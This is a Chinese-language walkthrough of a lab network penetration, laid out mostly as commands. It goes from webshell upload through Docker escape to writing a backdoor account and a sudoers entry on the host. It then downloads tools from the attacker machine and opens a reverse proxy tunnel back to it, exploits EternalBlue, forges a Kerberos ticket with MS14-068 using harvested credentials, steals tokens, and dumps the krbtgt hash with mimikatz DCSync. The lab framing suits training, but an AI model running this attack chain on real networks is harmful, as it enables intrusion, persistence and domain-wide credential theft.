环境介绍：

服务器：192.168.183.129、192.168.10.232

win7:192.168.183.131

DC:192.168.183.130

kali:192.168.10.182

1.拿webshell

对ubuntu的IP进行端口扫描

访问ubuntu的ip:2002 或2001或2003

用AWVS对IP：2002扫描

 对其进行抓包，改包，重放

 

上传后访问的页面

 用蚁剑连接（最好用冰蝎）

2.逃溢docker

连接后打开终端执行ip addr

可以对比我们搭建的环境看到是在docker环境里

要拿到服务器权限就要跳出docker

把sda1挂到docker里

cd /tmp

mkdir test

mount /dev/sda1 test

现在test相当与宿主机的根目录了

执行cat test/etc/passwd

这个时候可以用ssh连接

也可以写入我们自己的账号密码进行连接

cat /etc/passwd

cat /etc/shadow

在蚁剑里用下面命令写入

账号：admin123  密码：QAZWSXqaz

echo 'admin123:x:1001:1001::/home/admin123:/bin/bash'>>test/etc/passwd

echo 'admin123:$1$6jyq9ouK$v4zEUImeLNV0rLMP7i4bG0:19313:0:99999:7:::'>>test/etc/shadow

用kali主机连接

ssh admin123@192.168.10.232

不能直接useradd添加用户

3.提权

因为是普通用户，所以要提权

查看用户权限：

cat test/etc/sudoers

把admin123用户提到跟root用户权限一样

echo 'admin123 ALL=(ALL:ALL) ALL'>>test/etc/sudoers

执行

sudo su root

4.内网渗透

这里用的工具fscan_mda，下载地址：

https://github.com/shadow1ng/fscan/releases/tag/1.8.1https://github.com/shadow1ng/fscan/releases/tag/1.8.1

在fscan目录下先启一个服务：

python2:python -m SimpleHTTPServer 8888

python3:python -m http.server 8888

下载kali主机上的fscan_amd64扫描工具：

wget http://192.168.10.182:8888/fscan_amd64

注：192.168.10.182是kali的ip

 添加可执行权限：

chmod +x fscan_amd64

进行整段扫描：

./fscan_amd64 -h 192.168.183.1-255

192.168.183.130是域控，直接拿域控另一台主机就没用了。所以先对192.168.183.131这台主机进行攻击。

Venom下载地址：

Release Venom v1.1.0 · Dliv3/Venom · GitHubVenom - A Multi-hop Proxy for Penetration Testers. Contribute to Dliv3/Venom development by creating an account on GitHub.https://github.com/Dliv3/Venom/releases/tag/v1.1.0

在Venom目录下先启一个服务：

 python -m http.server 8888

在Venom目录下开启一个监听端：

./admin_linux_x64 -lport 5555

下载客户端agent_linux_x64:

wget http://192.168.10.182:8888/agent_linux_x64

 添加可执行权限：
chmod +x agent_linux_x64

让服务器回联本机：

 ./agent_linux_x64 -rhost 192.168.10.182 -rport 5555

这里收到代理的节点

goto 到节点:

goto 1

启动socks监听：

socks 7777

这样就在kali上使用了一个socks 7777的监听代理

现在我们就能请求内网了

然后用msf利用永恒之蓝漏洞（ms17_010）打内网主机

msfconsole

search ms17_010

use 0

set payload windows/x64/meterpreter/bind_tcp

设置代理：

set Proxies socks5:127.0.0.1:7777

 自己配置好就行

成功

拿域控 

shell

chcp 65001

systeminfo

cd c:\users

查看用户：

dir

很明显就是douser了

使用ms14-068:

ms14-068

<userName>:douser

<domainName>:demo.com   

systeminfo里的

<domainControlerAddr>:192.168.183.130

net view

nslookup \\TESTWIN7-PC

<clearPassword>:Dotest123

load kiwi

creds_all

 <domainControlerAddr>:S-1-5-21-979886063-1111900045-1414766810-1107

查看进程：

ps

 找到douser的进程的pid，从进程窃取token：

 steal_token 1200

注：不窃取token,直接执行whoami /all获取的是system的sid

获取令牌：

ms14-068 -u douser@demo.com -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130

导入令牌：

rev2self

shell

cd c:\users\douser\desktop

mimikatz

kerberos::ptc TGT_douser@demo.com.ccache

 dir \\WIN-ENS2VR5TR3N\c$

拿域控获取hash:

mimikatz

lsadump::dcsync /user:krbtgt /domain:demo.com